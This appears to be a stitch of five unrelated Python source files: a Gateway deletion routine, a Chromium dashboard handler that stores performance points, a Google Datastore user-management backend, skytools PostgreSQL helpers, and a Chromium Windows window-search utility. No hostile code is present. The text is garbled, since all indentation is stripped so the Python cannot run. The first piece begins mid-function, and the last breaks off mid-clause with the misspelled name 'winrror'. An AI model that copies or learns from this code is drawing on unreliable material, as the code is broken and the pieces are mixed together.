gateway = Gateway.Read( g_name_or_id )
if gateway:
g_id = gateway.g_id
else:
raise Exception("No such Gateway '%s'" % g_name_or_id )
key_name = Gateway.make_key_name( g_id=g_id )
def set_deleted():
# atomically set the gateway to deleted
g_key = storagetypes.make_key( cls, key_name )
gw = g_key.get()
if gw is None:
return None
gw.deleted = True
gw.put()
return gw.key
storagetypes.transaction( lambda: set_deleted() )
g_name_key = storagetypes.make_key( GatewayNameHolder, GatewayNameHolder.make_key_name( gateway.name ) )
g_name_delete_fut = g_name_key.delete_async()
driver_fut = GatewayDriver.unref_async( gateway.driver_hash )
storagetypes.wait_futures( [g_name_delete_fut, driver_fut] )
Gateway.FlushCache( g_id )
Gateway.FlushCacheDriver( gateway.driver_hash )
g_name_to_id_cache_key = Gateway.Read_ByName_name_cache_key( g_name_or_id )
storagetypes.memcache.delete( g_name_to_id_cache_key )
return True
@classmethod
def DeleteAll( cls, volume ):
"""
Given a Volume, delete all Gateways attached to it.
It's best to run this as a deferred task.
"""
def __delete_gw( gateway ):
cls.Delete( gateway.g_id )
cls.ListAll( {"Gateway.volume_id ==": volume.volume_id}, map_func=__delete_gw, projection=["g_id"] )
return True
| |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""URL endpoint to add new graph data to the datastore."""
import json
import logging
from google.appengine.api import datastore_errors
from google.appengine.ext import ndb
from dashboard import add_point
from dashboard import find_anomalies
from dashboard import graph_revisions
from dashboard import units_to_direction
from dashboard.common import datastore_hooks
from dashboard.common import request_handler
from dashboard.common import stored_object
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
BOT_WHITELIST_KEY = 'bot_whitelist'
class AddPointQueueHandler(request_handler.RequestHandler):
"""Request handler to process points and add them to the datastore.
This request handler is intended to be used only by requests using the
task queue; it shouldn't be directly from outside.
"""
def get(self):
"""A get request is the same a post request for this endpoint."""
self.post()
def post(self):
"""Adds a set of points from the post data.
Request parameters:
data: JSON encoding of a list of dictionaries. Each dictionary represents
one point to add. For each dict, one Row entity will be added, and
any required TestMetadata or Master or Bot entities will be created.
"""
datastore_hooks.SetPrivilegedRequest()
data = json.loads(self.request.get('data'))
_PrewarmGets(data)
bot_whitelist = stored_object.Get(BOT_WHITELIST_KEY)
all_put_futures = []
added_rows = []
monitored_test_keys = []
for row_dict in data:
try:
new_row, parent_test, put_futures = _AddRow(row_dict, bot_whitelist)
added_rows.append(new_row)
is_monitored = parent_test.sheriff and parent_test.has_rows
if is_monitored:
monitored_test_keys.append(parent_test.key)
all_put_futures.extend(put_futures)
except add_point.BadRequestError as e:
logging.error('Could not add %s, it was invalid.', e.message)
except datastore_errors.BadRequestError as e:
logging.info('While trying to store %s', row_dict)
logging.error('Datastore request failed: %s.', e.message)
return
ndb.Future.wait_all(all_put_futures)
tests_keys = [k for k in monitored_test_keys if not _IsRefBuild(k)]
# Updating of the cached graph revisions should happen after put because
# it requires the new row to have a timestamp, which happens upon put.
futures = [
graph_revisions.AddRowsToCacheAsync(added_rows),
find_anomalies.ProcessTestsAsync(tests_keys)]
ndb.Future.wait_all(futures)
def _PrewarmGets(data):
"""Prepares the cache so that fetching is faster later.
The add_point request handler does a LOT of gets, and it's possible for
each to take seconds.
However, NDB will does automatic in-context caching:
https://developers.google.com/appengine/docs/python/ndb/cache#incontext
This means that doing an async get() at the start will cache the result, so
that we can prewarm the cache for everything we'll need throughout the
request at the start.
Args:
data: The request json.
"""
# Prewarm lookups of masters, bots, and tests.
master_keys = {ndb.Key('Master', r['master']) for r in data}
bot_keys = {ndb.Key('Master', r['master'], 'Bot', r['bot']) for r in data}
test_keys = set()
for row in data:
start = '%s/%s' % (row['master'], row['bot'])
test_parts = row['test'].split('/')
for part in test_parts:
if not part:
break
start += '/%s' % part
test_keys.add(ndb.Key('TestMetadata', start))
ndb.get_multi_async(list(master_keys) + list(bot_keys) + list(test_keys))
def _AddRow(row_dict, bot_whitelist):
"""Adds a Row entity to the datastore.
There are three main things that are needed in order to make a new entity;
the ID, the parent key, and all of the properties. Making these three
things, and validating the related input fields, are delegated to
sub-functions.
Args:
row_dict: A dictionary obtained from the JSON that was received.
bot_whitelist: A list of whitelisted bots names.
Returns:
A triple: The new row, the parent test, and a list of entity put futures.
Raises:
add_point.BadRequestError: The input dict was invalid.
RuntimeError: The required parent entities couldn't be created.
"""
parent_test = _GetParentTest(row_dict, bot_whitelist)
test_container_key = utils.GetTestContainerKey(parent_test.key)
columns = add_point.GetAndValidateRowProperties(row_dict)
columns['internal_only'] = parent_test.internal_only
row_id = add_point.GetAndValidateRowId(row_dict)
# Update the last-added revision record for this test.
master, bot, test = row_dict['master'], row_dict['bot'], row_dict['test']
test_path = '%s/%s/%s' % (master, bot, test)
last_added_revision_entity = graph_data.LastAddedRevision(
id=test_path, revision=row_id)
entity_put_futures = []
entity_put_futures.append(last_added_revision_entity.put_async())
# If the row ID isn't the revision, that means that the data is Chrome OS
# data, and we want the default revision to be Chrome version.
if row_id != row_dict.get('revision'):
columns['a_default_rev'] = 'r_chrome_version'
# Create the entity and add it asynchronously.
new_row = graph_data.Row(id=row_id, parent=test_container_key, **columns)
entity_put_futures.append(new_row.put_async())
return new_row, parent_test, entity_put_futures
def _GetParentTest(row_dict, bot_whitelist):
"""Gets the parent test for a Row based on an input dictionary.
Args:
row_dict: A dictionary from the data parameter.
bot_whitelist: A list of whitelisted bot names.
Returns:
A TestMetadata entity.
Raises:
RuntimeError: Something went wrong when trying to get the parent test.
"""
master_name = row_dict.get('master')
bot_name = row_dict.get('bot')
test_name = row_dict.get('test').strip('/')
units = row_dict.get('units')
higher_is_better = row_dict.get('higher_is_better')
improvement_direction = _ImprovementDirection(higher_is_better)
internal_only = BotInternalOnly(bot_name, bot_whitelist)
benchmark_description = row_dict.get('benchmark_description')
unescaped_story_name = row_dict.get('unescaped_story_name')
parent_test = GetOrCreateAncestors(
master_name, bot_name, test_name, internal_only=internal_only,
benchmark_description=benchmark_description, units=units,
improvement_direction=improvement_direction,
unescaped_story_name=unescaped_story_name)
return parent_test
def _ImprovementDirection(higher_is_better):
"""Returns an improvement direction (constant from alerts_data) or None."""
if higher_is_better is None:
return None
return anomaly.UP if higher_is_better else anomaly.DOWN
def BotInternalOnly(bot_name, bot_whitelist):
"""Checks whether a given bot name is internal-only.
If a bot name is internal only, then new data for that bot should be marked
as internal-only.
"""
if not bot_whitelist:
logging.warning(
'No bot whitelist available. All data will be internal-only. If this '
'is not intended, please add a bot whitelist using /edit_site_config.')
return True
return bot_name not in bot_whitelist
def GetOrCreateAncestors(
master_name, bot_name, test_name, internal_only=True,
benchmark_description='', units=None, improvement_direction=None,
unescaped_story_name=None):
"""Gets or creates all parent Master, Bot, TestMetadata entities for a Row."""
master_entity = _GetOrCreateMaster(master_name)
_GetOrCreateBot(bot_name, master_entity.key, internal_only)
# Add all ancestor tests to the datastore in order.
ancestor_test_parts = test_name.split('/')
test_path = '%s/%s' % (master_name, bot_name)
suite = None
for index, ancestor_test_name in enumerate(ancestor_test_parts):
# Certain properties should only be updated if the TestMetadata is for a
# leaf test.
is_leaf_test = (index == len(ancestor_test_parts) - 1)
test_properties = {
'units': units if is_leaf_test else None,
'internal_only': internal_only,
}
if is_leaf_test and improvement_direction is not None:
test_properties['improvement_direction'] = improvement_direction
if is_leaf_test and unescaped_story_name is not None:
test_properties['unescaped_story_name'] = unescaped_story_name
ancestor_test = _GetOrCreateTest(
ancestor_test_name, test_path, test_properties)
if index == 0:
suite = ancestor_test
test_path = ancestor_test.test_path
if benchmark_description and suite.description != benchmark_description:
suite.description = benchmark_description
return ancestor_test
def _GetOrCreateMaster(name):
"""Gets or creates a new Master."""
existing = graph_data.Master.get_by_id(name)
if existing:
return existing
new_entity = graph_data.Master(id=name)
new_entity.put()
return new_entity
def _GetOrCreateBot(name, parent_key, internal_only):
"""Gets or creates a new Bot under the given Master."""
existing = graph_data.Bot.get_by_id(name, parent=parent_key)
if existing:
if existing.internal_only != internal_only:
existing.internal_only = internal_only
existing.put()
return existing
logging.info('Adding bot %s/%s', parent_key.id(), name)
new_entity = graph_data.Bot(
id=name, parent=parent_key, internal_only=internal_only)
new_entity.put()
return new_entity
def _GetOrCreateTest(name, parent_test_path, properties):
"""Either gets an entity if it already exists, or creates one.
If the entity already exists but the properties are different than the ones
specified, then the properties will be updated first. This implies that a
new point is being added for an existing TestMetadata, so if the TestMetadata
has been previously marked as deprecated then it can be updated and marked as
non-deprecated.
If the entity doesn't yet exist, a new one will be created with the given
properties.
Args:
name: The string ID of the Test to get or create.
parent_test_path: The test_path of the parent entity.
properties: A dictionary of properties that should be set.
Returns:
An entity (which has already been put).
Raises:
datastore_errors.BadRequestError: Something went wrong getting the entity.
"""
test_path = '%s/%s' % (parent_test_path, name)
existing = graph_data.TestMetadata.get_by_id(test_path)
if not existing:
# Add improvement direction if this is a new test.
if 'units' in properties and 'improvement_direction' not in properties:
units = properties['units']
direction = units_to_direction.GetImprovementDirection(units)
properties['improvement_direction'] = direction
elif 'units' not in properties or properties['units'] is None:
properties['improvement_direction'] = anomaly.UNKNOWN
new_entity = graph_data.TestMetadata(id=test_path, **properties)
new_entity.put()
# TODO(sullivan): Consider putting back Test entity in a scoped down
# form so we can check if it exists here.
return new_entity
# Flag indicating whether we want to re-put the entity before returning.
properties_changed = False
if existing.deprecated:
existing.deprecated = False
properties_changed = True
# Special case to update improvement direction from units for TestMetadata
# entities when units are being updated. If an improvement direction is
# explicitly provided in the properties, then we can skip this check since it
# will get overwritten below. Additionally, by skipping we avoid
# touching the entity and setting off an expensive put() operation.
if properties.get('improvement_direction') is None:
units = properties.get('units')
if units:
direction = units_to_direction.GetImprovementDirection(units)
if direction != existing.improvement_direction:
properties['improvement_direction'] = direction
# Go through the list of general properties and update if necessary.
for prop, value in properties.items():
if (hasattr(existing, prop) and value is not None and
getattr(existing, prop) != value):
setattr(existing, prop, value)
properties_changed = True
if properties_changed:
existing.put()
return existing
def _IsRefBuild(test_key):
"""Checks whether a TestMetadata is for a reference build test run."""
test_parts = test_key.id().split('/')
return test_parts[-1] == 'ref' or test_parts[-1].endswith('_ref')
| |
import usermgmtlib.usermgmt as usermgmt
from usermgmtlib.backends import Backend, Singleton
import google.auth
from google.cloud import datastore
def sanitize_attribute(item, attr):
try:
if isinstance(item[attr], str):
return str(item[attr])
elif isinstance(item[attr], bytes):
return item[attr].decode('utf-8')
elif isinstance(item[attr], list):
return [i.decode('utf-8') if isinstance(i, str) else i for i in item[attr]]
else:
return item[attr]
except (KeyError, AttributeError):
return None
class Role(usermgmt.Role):
def refresh(self):
conn = connection()
r = conn.get_role(self.rolename)
self.__dict__.update(r.__dict__)
return True
def save(self):
conn = connection()
conn.delete_role(self.rolename)
ds_entity = conn.new_ds_entity('usermgmt_roles', self.rolename)
ds_entity.update(self.get_dict())
ds_entity['groups'] = list(self.groups)
conn.client.put(ds_entity)
return True
class Group(usermgmt.Group):
def refresh(self):
conn = connection()
g = conn.get_group(self.groupname)
self.__dict__.update(g.__dict__)
return True
def save(self):
conn = connection()
conn.delete_group(self.groupname)
ds_entity = conn.new_ds_entity('usermgmt_groups', self.groupname)
ds_entity.update(self.get_dict())
conn.client.put(ds_entity)
return True
class User(usermgmt.User):
def set(self, attribute, value):
self.refresh()
attr = setattr(self, attribute, value)
self.save()
return True
def refresh(self):
conn = connection()
u = conn.get_user(self.username)
self.__dict__.update(u.__dict__)
return True
def save(self):
conn = connection()
conn.delete_user(self.username)
ds_entity = conn.new_ds_entity('usermgmt_users', self.username)
ds_entity.update(self.get_dict())
ds_entity['public_keys'] = list(self.public_keys)
ds_entity['groups'] = list(self.groups)
conn.client.put(ds_entity)
return True
class connection(Backend):
__metaclass__ = Singleton
def __init__(self):
self.name = 'datastore'
credentials, project = google.auth.default()
self.client = datastore.Client(project)
def get_kind_list(self, kind, order=None):
query = self.client.query(kind=kind)
if order:
query.order = [order]
return list(query.fetch())
def delete_ds_key(self, kind, key):
ds_key = self.client.key(kind, key)
return self.client.delete(ds_key)
def get_ds_entity(self, kind, key):
try:
ds_key = self.client.key(kind, key)
ds_get = self.client.get(ds_key)
return ds_get
except:
print('Entity not found.')
pass
return False
def new_ds_entity(self, kind, key):
ds_key = self.client.key(kind, key)
return datastore.Entity(key=ds_key)
def get_users(self):
ds_users = self.get_kind_list('usermgmt_users')
if not ds_users: return []
users = []
for u in ds_users:
users.append(
User(
username=u.key.name,
hash_ldap=sanitize_attribute(u, 'hash_ldap'),
uidNumber=sanitize_attribute(u, 'uidNumber'),
email=sanitize_attribute(u, 'email'),
public_keys=sanitize_attribute(u, 'public_keys'),
groups=sanitize_attribute(u, 'groups')
)
)
return users
def get_groups(self):
groups = []
ds_groups = self.get_kind_list('usermgmt_groups')
if not ds_groups: return []
for g in ds_groups:
groups.append(
Group(
groupname=g.key.name,
gid=sanitize_attribute(g, 'gid')
)
)
return groups
def get_roles(self):
roles = []
ds_roles = self.get_kind_list('usermgmt_roles')
for r in ds_roles:
roles.append(
Role(
rolename=r.key.name,
groups=sanitize_attribute(r, 'groups')
)
)
return roles
def get_user(self, username):
ds_user = self.get_ds_entity('usermgmt_users', username)
if not ds_user: return False
return User(
username=ds_user.key.name,
hash_ldap=sanitize_attribute(ds_user, 'hash_ldap'),
password_mod_date=sanitize_attribute(ds_user, 'password_mod_date'),
email=sanitize_attribute(ds_user, 'email'),
uidNumber=sanitize_attribute(ds_user, 'uidNumber'),
public_keys=sanitize_attribute(ds_user, 'public_keys'),
sshkey_mod_date=sanitize_attribute(ds_user, 'sshkey_mod_date'),
groups=sanitize_attribute(ds_user, 'groups'),
auth_code=sanitize_attribute(ds_user, 'auth_code'),
auth_code_date=sanitize_attribute(ds_user, 'auth_code_date')
)
def get_role(self, rolename):
ds_role = self.get_ds_entity('usermgmt_roles', rolename)
if not ds_role: return False
return Role(
rolename=ds_role.key.name,
groups=sanitize_attribute(ds_role, 'groups')
)
def get_group(self, groupname):
ds_group = self.get_ds_entity('usermgmt_group', groupname)
if not ds_group: return False
return Group(
groupname=ds_group.key.name,
gid=sanitize_attribute(ds_group, 'gid')
)
def create_role(self, rolename, groups):
r = Role(
rolename=rolename,
groups=groups
)
r.save()
return r
def create_group(self, groupname):
g = Group(
groupname=groupname,
gid=str(self.get_max_gid())
)
g.save()
return g
def create_user(self, username, email, rolename):
u = User(
username=username,
email=email,
groups=self.get_role(rolename).groups,
uidNumber=str(self.get_max_uidNumber())
)
u.save()
return u
def delete_role(self, rolename):
return self.delete_ds_key('usermgmt_roles', rolename)
def delete_user(self, username):
return self.delete_ds_key('usermgmt_users', username)
def delete_group(self, groupname):
members = self.get_group_users(groupname)
for member in members:
self.remove_user_from_group(member, groupname)
if self.get_group_users(groupname):
return False
return self.delete_ds_key('usermgmt_groups', groupname)
def add_group_to_role(self, rolename, groupname):
r = self.get_role(rolename)
if groupname not in r.groups:
r.groups.add(groupname)
r.save()
return True
else:
return False
def remove_group_from_role(self, rolename, groupname):
r = self.get_role(rolename)
if groupname in r.groups:
r.groups.remove(groupname)
r.save()
return True
else:
return False
def add_user_to_group(self, username, groupname):
u = self.get_user(username)
if groupname not in u.groups:
u.groups.add(groupname)
u.save()
return True
else:
return False
def remove_user_from_group(self, username, groupname):
u = self.get_user(username)
if groupname in u.groups:
u.groups.remove(groupname)
u.save()
return True
else:
return False
def get_group_users(self, groupname):
users = self.get_users()
return [u.username for u in users if groupname in u.groups]
def get_max_gid(self):
try:
max_gid = int(max([group.gid for group in self.get_groups()]))+1
except ValueError:
max_gid = 9000
return max_gid
def get_max_uidNumber(self):
try:
max_uidNumber = int(max([user.uidNumber for user in self.get_users()]))+1
except ValueError:
max_uidNumber = 2500
return max_uidNumber
| |
"""Database tools."""
import os
from cStringIO import StringIO
from skytools.quoting import quote_copy, quote_literal, quote_ident, quote_fqident
import skytools.installer_config
__all__ = [
"fq_name_parts", "fq_name", "get_table_oid", "get_table_pkeys",
"get_table_columns", "exists_schema", "exists_table", "exists_type",
"exists_function", "exists_language", "Snapshot", "magic_insert",
"CopyPipe", "full_copy", "DBObject", "DBSchema", "DBTable", "DBFunction",
"DBLanguage", "db_install", "installer_find_file", "installer_apply_file",
"dbdict", "mk_insert_sql", "mk_update_sql", "mk_delete_sql",
]
class dbdict(dict):
"""Wrapper on actual dict that allows
accessing dict keys as attributes."""
# obj.foo access
def __getattr__(self, k): return self[k]
def __setattr__(self, k, v): self[k] = v
def __delattr__(self, k): del self[k]
#
# Fully qualified table name
#
def fq_name_parts(tbl):
"Return fully qualified name parts."
tmp = tbl.split('.', 1)
if len(tmp) == 1:
return ('public', tbl)
elif len(tmp) == 2:
return tmp
else:
raise Exception('Syntax error in table name:'+tbl)
def fq_name(tbl):
"Return fully qualified name."
return '.'.join(fq_name_parts(tbl))
#
# info about table
#
def get_table_oid(curs, table_name):
schema, name = fq_name_parts(table_name)
q = """select c.oid from pg_namespace n, pg_class c
where c.relnamespace = n.oid
and n.nspname = %s and c.relname = %s"""
curs.execute(q, [schema, name])
res = curs.fetchall()
if len(res) == 0:
raise Exception('Table not found: '+table_name)
return res[0][0]
def get_table_pkeys(curs, tbl):
oid = get_table_oid(curs, tbl)
q = "SELECT k.attname FROM pg_index i, pg_attribute k"\
" WHERE i.indrelid = %s AND k.attrelid = i.indexrelid"\
" AND i.indisprimary AND k.attnum > 0 AND NOT k.attisdropped"\
" ORDER BY k.attnum"
curs.execute(q, [oid])
return map(lambda x: x[0], curs.fetchall())
def get_table_columns(curs, tbl):
oid = get_table_oid(curs, tbl)
q = "SELECT k.attname FROM pg_attribute k"\
" WHERE k.attrelid = %s"\
" AND k.attnum > 0 AND NOT k.attisdropped"\
" ORDER BY k.attnum"
curs.execute(q, [oid])
return map(lambda x: x[0], curs.fetchall())
#
# exist checks
#
def exists_schema(curs, schema):
q = "select count(1) from pg_namespace where nspname = %s"
curs.execute(q, [schema])
res = curs.fetchone()
return res[0]
def exists_table(curs, table_name):
schema, name = fq_name_parts(table_name)
q = """select count(1) from pg_namespace n, pg_class c
where c.relnamespace = n.oid and c.relkind = 'r'
and n.nspname = %s and c.relname = %s"""
curs.execute(q, [schema, name])
res = curs.fetchone()
return res[0]
def exists_type(curs, type_name):
schema, name = fq_name_parts(type_name)
q = """select count(1) from pg_namespace n, pg_type t
where t.typnamespace = n.oid
and n.nspname = %s and t.typname = %s"""
curs.execute(q, [schema, name])
res = curs.fetchone()
return res[0]
def exists_function(curs, function_name, nargs):
# this does not check arg types, so may match several functions
schema, name = fq_name_parts(function_name)
q = """select count(1) from pg_namespace n, pg_proc p
where p.pronamespace = n.oid and p.pronargs = %s
and n.nspname = %s and p.proname = %s"""
curs.execute(q, [nargs, schema, name])
res = curs.fetchone()
# if unqualified function, check builtin functions too
if not res[0] and function_name.find('.') < 0:
name = "pg_catalog." + function_name
return exists_function(curs, name, nargs)
return res[0]
def exists_language(curs, lang_name):
q = """select count(1) from pg_language
where lanname = %s"""
curs.execute(q, [lang_name])
res = curs.fetchone()
return res[0]
#
# Support for PostgreSQL snapshot
#
class Snapshot(object):
"Represents a PostgreSQL snapshot."
def __init__(self, str):
"Create snapshot from string."
self.sn_str = str
tmp = str.split(':')
if len(tmp) != 3:
raise Exception('Unknown format for snapshot')
self.xmin = int(tmp[0])
self.xmax = int(tmp[1])
self.txid_list = []
if tmp[2] != "":
for s in tmp[2].split(','):
self.txid_list.append(int(s))
def contains(self, txid):
"Is txid visible in snapshot."
txid = int(txid)
if txid < self.xmin:
return True
if txid >= self.xmax:
return False
if txid in self.txid_list:
return False
return True
#
# Copy helpers
#
def _gen_dict_copy(tbl, row, fields, qfields):
tmp = []
for f in fields:
v = row.get(f)
tmp.append(quote_copy(v))
return "\t".join(tmp)
def _gen_dict_insert(tbl, row, fields, qfields):
tmp = []
for f in fields:
v = row.get(f)
tmp.append(quote_literal(v))
fmt = "insert into %s (%s) values (%s);"
return fmt % (tbl, ",".join(qfields), ",".join(tmp))
def _gen_list_copy(tbl, row, fields, qfields):
tmp = []
for i in range(len(fields)):
v = row[i]
tmp.append(quote_copy(v))
return "\t".join(tmp)
def _gen_list_insert(tbl, row, fields, qfields):
tmp = []
for i in range(len(fields)):
v = row[i]
tmp.append(quote_literal(v))
fmt = "insert into %s (%s) values (%s);"
return fmt % (tbl, ",".join(qfields), ",".join(tmp))
def magic_insert(curs, tablename, data, fields = None, use_insert = 0):
"""Copy/insert a list of dict/list data to database.
If curs == None, then the copy or insert statements are returned
as string. For list of dict the field list is optional, as its
possible to guess them from dict keys.
"""
if len(data) == 0:
return
# decide how to process
if hasattr(data[0], 'keys'):
if fields == None:
fields = data[0].keys()
if use_insert:
row_func = _gen_dict_insert
else:
row_func = _gen_dict_copy
else:
if fields == None:
raise Exception("Non-dict data needs field list")
if use_insert:
row_func = _gen_list_insert
else:
row_func = _gen_list_copy
qfields = [quote_ident(f) for f in fields]
qtablename = quote_fqident(tablename)
# init processing
buf = StringIO()
if curs == None and use_insert == 0:
fmt = "COPY %s (%s) FROM STDIN;\n"
buf.write(fmt % (qtablename, ",".join(qfields)))
# process data
for row in data:
buf.write(row_func(qtablename, row, fields, qfields))
buf.write("\n")
# if user needs only string, return it
if curs == None:
if use_insert == 0:
buf.write("\\.\n")
return buf.getvalue()
# do the actual copy/inserts
if use_insert:
curs.execute(buf.getvalue())
else:
buf.seek(0)
hdr = "%s (%s)" % (qtablename, ",".join(qfields))
curs.copy_from(buf, hdr)
#
# Full COPY of table from one db to another
#
class CopyPipe(object):
"Splits one big COPY to chunks."
def __init__(self, dstcurs, tablename = None, limit = 512*1024, cancel_func=None, sql_from = None):
self.tablename = tablename
self.sql_from = sql_from
self.dstcurs = dstcurs
self.buf = StringIO()
self.limit = limit
self.cancel_func = None
self.total_rows = 0
self.total_bytes = 0
def write(self, data):
"New data from psycopg"
self.total_bytes += len(data)
self.total_rows += data.count("\n")
if self.buf.tell() >= self.limit:
pos = data.find('\n')
if pos >= 0:
# split at newline
p1 = data[:pos + 1]
p2 = data[pos + 1:]
self.buf.write(p1)
self.flush()
data = p2
self.buf.write(data)
def flush(self):
"Send data out."
if self.cancel_func:
self.cancel_func()
if self.buf.tell() <= 0:
return
self.buf.seek(0)
if self.sql_from:
self.dstcurs.copy_expert(self.sql_from, self.buf)
else:
self.dstcurs.copy_from(self.buf, self.tablename)
self.buf.seek(0)
self.buf.truncate()
def full_copy(tablename, src_curs, dst_curs, column_list = []):
"""COPY table from one db to another."""
qtable = quote_fqident(tablename)
if column_list:
qfields = [quote_ident(f) for f in column_list]
hdr = "%s (%s)" % (qtable, ",".join(qfields))
else:
hdr = qtable
if hasattr(src_curs, 'copy_expert'):
sql_to = "COPY %s TO stdout" % hdr
sql_from = "COPY %s FROM stdout" % hdr
buf = CopyPipe(dst_curs, sql_from = sql_from)
src_curs.copy_expert(sql_to, buf)
else:
buf = CopyPipe(dst_curs, hdr)
src_curs.copy_to(buf, hdr)
buf.flush()
return (buf.total_bytes, buf.total_rows)
#
# SQL installer
#
class DBObject(object):
"""Base class for installable DB objects."""
name = None
sql = None
sql_file = None
def __init__(self, name, sql = None, sql_file = None):
self.name = name
self.sql = sql
self.sql_file = sql_file
def create(self, curs, log = None):
if log:
log.info('Installing %s' % self.name)
if self.sql:
sql = self.sql
elif self.sql_file:
fn = self.find_file()
if log:
log.info(" Reading from %s" % fn)
sql = open(fn, "r").read()
else:
raise Exception('object not defined')
for stmt in skytools.parse_statements(sql):
#if log: log.debug(repr(stmt))
curs.execute(stmt)
def find_file(self):
full_fn = None
if self.sql_file[0] == "/":
full_fn = self.sql_file
else:
dir_list = skytools.installer_config.sql_locations
for dir in dir_list:
fn = os.path.join(dir, self.sql_file)
if os.path.isfile(fn):
full_fn = fn
break
if not full_fn:
raise Exception('File not found: '+self.sql_file)
return full_fn
class DBSchema(DBObject):
"""Handles db schema."""
def exists(self, curs):
return exists_schema(curs, self.name)
class DBTable(DBObject):
"""Handles db table."""
def exists(self, curs):
return exists_table(curs, self.name)
class DBFunction(DBObject):
"""Handles db function."""
def __init__(self, name, nargs, sql = None, sql_file = None):
DBObject.__init__(self, name, sql, sql_file)
self.nargs = nargs
def exists(self, curs):
return exists_function(curs, self.name, self.nargs)
class DBLanguage(DBObject):
"""Handles db language."""
def __init__(self, name):
DBObject.__init__(self, name, sql = "create language %s" % name)
def exists(self, curs):
return exists_language(curs, self.name)
def db_install(curs, list, log = None):
"""Installs list of objects into db."""
for obj in list:
if not obj.exists(curs):
obj.create(curs, log)
else:
if log:
log.info('%s is installed' % obj.name)
def installer_find_file(filename):
full_fn = None
if filename[0] == "/":
if os.path.isfile(filename):
full_fn = filename
else:
dir_list = ["."] + skytools.installer_config.sql_locations
for dir in dir_list:
fn = os.path.join(dir, filename)
if os.path.isfile(fn):
full_fn = fn
break
if not full_fn:
raise Exception('File not found: '+filename)
return full_fn
def installer_apply_file(db, filename, log):
fn = installer_find_file(filename)
sql = open(fn, "r").read()
if log:
log.info("applying %s" % fn)
curs = db.cursor()
for stmt in skytools.parse_statements(sql):
#log.debug(repr(stmt))
curs.execute(stmt)
#
# Generate INSERT/UPDATE/DELETE statement
#
def mk_insert_sql(row, tbl, pkey_list = None, field_map = None):
"""Generate INSERT statement from dict data."""
col_list = []
val_list = []
if field_map:
for src, dst in field_map.iteritems():
col_list.append(quote_ident(dst))
val_list.append(quote_literal(row[src]))
else:
for c, v in row.iteritems():
col_list.append(quote_ident(c))
val_list.append(quote_literal(v))
col_str = ", ".join(col_list)
val_str = ", ".join(val_list)
return "insert into %s (%s) values (%s);" % (
quote_fqident(tbl), col_str, val_str)
def mk_update_sql(row, tbl, pkey_list, field_map = None):
"""Generate UPDATE statement from dict data."""
if len(pkey_list) < 1:
raise Exception("update needs pkeys")
set_list = []
whe_list = []
pkmap = {}
for k in pkey_list:
pkmap[k] = 1
new_k = field_map and field_map[k] or k
col = quote_ident(new_k)
val = quote_literal(row[k])
whe_list.append("%s = %s" % (col, val))
if field_map:
for src, dst in field_map.iteritems():
if src not in pkmap:
col = quote_ident(dst)
val = quote_literal(row[src])
set_list.append("%s = %s" % (col, val))
else:
for col, val in row.iteritems():
if col not in pkmap:
col = quote_ident(col)
val = quote_literal(val)
set_list.append("%s = %s" % (col, val))
return "update %s set %s where %s;" % (quote_fqident(tbl),
", ".join(set_list), " and ".join(whe_list))
def mk_delete_sql(row, tbl, pkey_list, field_map = None):
"""Generate DELETE statement from dict data."""
if len(pkey_list) < 1:
raise Exception("delete needs pkeys")
whe_list = []
for k in pkey_list:
new_k = field_map and field_map[k] or k
col = quote_ident(new_k)
val = quote_literal(row[k])
whe_list.append("%s = %s" % (col, val))
whe_str = " and ".join(whe_list)
return "delete from %s where %s;" % (quote_fqident(tbl), whe_str)
| |
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import time
import pythoncom
import pywintypes
import win32api
import win32com
import win32com.client
import win32con
import win32gui
import win32process
import winerror
class _MessageQueueAttacher(object):
"""Wrapper class for message queue attachment."""
def __enter__(self):
"""Attaches the current thread to the foreground window's message queue.
This is an old and well known exploit used to bypass Windows Focus rules:
http://www.google.com/search?q=attachthreadinput+setforegroundwindow
"""
self._active_thread_id = 0
active_hwnd = win32gui.GetForegroundWindow()
if not active_hwnd:
logging.warning('No active window is found.')
return
current_thread_id = win32api.GetCurrentThreadId()
active_thread_id, _ = win32process.GetWindowThreadProcessId(active_hwnd)
win32process.AttachThreadInput(current_thread_id, active_thread_id, 1)
logging.info('Attached current thread input %s to active thread: %s',
current_thread_id, active_thread_id)
self._active_thread_id = active_thread_id
def __exit__(self, unused_type, unused_value, unused_traceback):
"""Detaches the current thread from the active thread's message queue."""
if not self._active_thread_id:
return
current_thread_id = win32api.GetCurrentThreadId()
win32process.AttachThreadInput(current_thread_id, self._active_thread_id, 0)
logging.info('Detached current thread input %s from thread: %s',
current_thread_id, self._active_thread_id)
def SetForegroundWindow(hwnd):
"""Brings the given window to foreground.
Args:
hwnd: Handle of the window to bring to the foreground.
"""
with _MessageQueueAttacher():
return bool(win32gui.SetForegroundWindow(hwnd))
def FindWindowsWithText(parent, text_to_search):
"""Finds windows with given text.
Args:
parent: Handle to the parent window whose child windows are to be searched.
text_to_search: Substring to search within Windows text, case-insensitive.
Returns:
A list of HWND that match the search condition.
"""
class WindowFoundHandler(object):
"""Callback class for window enumeration."""
def __init__(self, text_to_search):
self.result = []
self._text_to_search = text_to_search
def Process(self, handle):
"""Callback function when enumerating a window.
Args:
handle: HWND to the enumerated window.
"""
text = win32gui.GetWindowText(handle).lower()
text_to_search = self._text_to_search.lower()
if text_to_search in text:
self.result.append(handle)
def WinFoundCallback(hwnd, window_found_handler):
window_found_handler.Process(hwnd)
handler = WindowFoundHandler(text_to_search)
try:
win32gui.EnumChildWindows(parent, WinFoundCallback, handler)
except pywintypes.error as e:
logging.info('Error while searching [%s], error: [%s]', text_to_search, e)
return handler.result
def FindWindowsWithTitle(title_to_search):
"""Finds windows with given title.
Args:
title_to_search: Window title substring to search, case-insensitive.
Returns:
A list of HWND that match the search condition.
"""
desktop_handle = None
return FindWindowsWithText(desktop_handle, title_to_search)
def FindWindow(title, class_name, parent=0, child_after=0):
"""Finds a window of a given title and class.
Args:
title: Title of the window to search.
class_name: Class name of the window to search.
parent: Handle to the parent window whose child windows are to be searched.
child_after: HWND to a child window. Search begins with the next child
window in the Z order.
Returns:
Handle of the found window, or 0 if not found.
"""
hwnd = 0
try:
hwnd = win32gui.FindWindowEx(
int(parent), int(child_after), class_name, title)
except win32gui.error as err:
if err[0] == winrror.ERROR_INVALID_WINDOW_HANDLE: # Could be closed.
pass
